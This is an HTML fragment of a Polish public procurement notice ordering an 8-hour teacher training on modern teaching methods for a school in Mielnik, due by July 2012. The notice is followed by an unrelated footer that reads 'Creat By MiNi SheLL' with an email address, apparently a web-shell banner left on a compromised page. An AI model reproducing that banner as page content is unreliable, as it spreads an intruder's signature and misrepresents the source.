<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zakup usługi szkoleniowej: Szkolenie na temat innowacyjnych metod nauczania dla nauczycieli Zespołu Szkół w Mielniku - szkolenie na temat zastosowania nowoczesnych środków, form i metod nauczania (np. tablice multimedialne, metoda projektów, technologia informatyczna) - przeprowadzenie szkolenia w wymiarze 8 godzin + materiały szkoleniowe; wymagane jest by prowadzący to szkolenie posiadał kwalifikacje w zakresie szkoleń w w/w tematyce;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup usługi szkoleniowej: Szkolenie na temat innowacyjnych metod nauczania dla nauczycieli Zespołu Szkół w Mielniku - szkolenie na temat zastosowania nowoczesnych środków, form i metod nauczania (np. tablice multimedialne, metoda projektów, technologia informatyczna) - przeprowadzenie szkolenia w wymiarze 8 godzin + materiały szkoleniowe; wymagane jest by prowadzący to szkolenie posiadał kwalifikacje w zakresie szkoleń w w/w tematyce;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com